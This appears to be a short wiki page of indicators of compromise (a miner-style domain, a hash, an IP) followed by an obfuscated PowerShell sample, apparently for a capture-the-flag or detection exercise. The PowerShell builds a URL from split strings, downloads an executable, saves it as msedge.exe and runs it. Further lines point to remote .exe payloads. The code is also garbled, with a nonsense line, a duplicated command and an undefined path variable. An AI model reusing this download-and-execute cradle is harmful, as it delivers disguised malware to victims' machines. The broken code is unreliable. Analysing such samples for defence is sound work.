IOC & OBFUSCATED POWERSHELL SAMPLE

Nicolas Saputra Gunawan edited this page Nov 4, 2024 · 1 revision

Domain:

  • donate.v2.xmrig.xom

Hash:

  • 4db55b2df58083e75c9471d2b79e1f9edf9491f423313b4e125349fed3507227

IP:

  • 54.38.54.135

PowerShell:

$u='ht'+'tp://192.168.0.16:8282/B64_dec'+'ode_RkxBR3tEYXl1bV90aGlzX'+'2lzX3NlY3JldF9maWxlfQ%3'+'D%3D/chall_mem_se'+'arch.e'+'xe';$t='Wan'+'iTem'+'p';mkdir -force $env:TMP\..\$t;try{iwr $u -OutFile $d\msedge.exe;& $d\msedge.exe;}catch{}
anjashdadada-asd;
$awikwok = 'https://cyberyolk.com/malwer.exe'
$bajigur = 'http://102.232.233.121/affah.exe'
$u='ht'+'tp://192.168.0.16:8282/B64_dec'+'ode_RkxBR3tEYXl1bV90aGlzX'+'2lzX3NlY3JldF9maWxlfQ%3'+'D%3D/chall_mem_se'+'arch.e'+'xe';$t='Wan'+'iTem'+'p';mkdir -force $env:TMP\..\$t;try{iwr $u -OutFile $d\msedge.exe;& $d\msedge.exe;}catch{}
$a = 'Https://v1.lonlife.info/ayam.exe'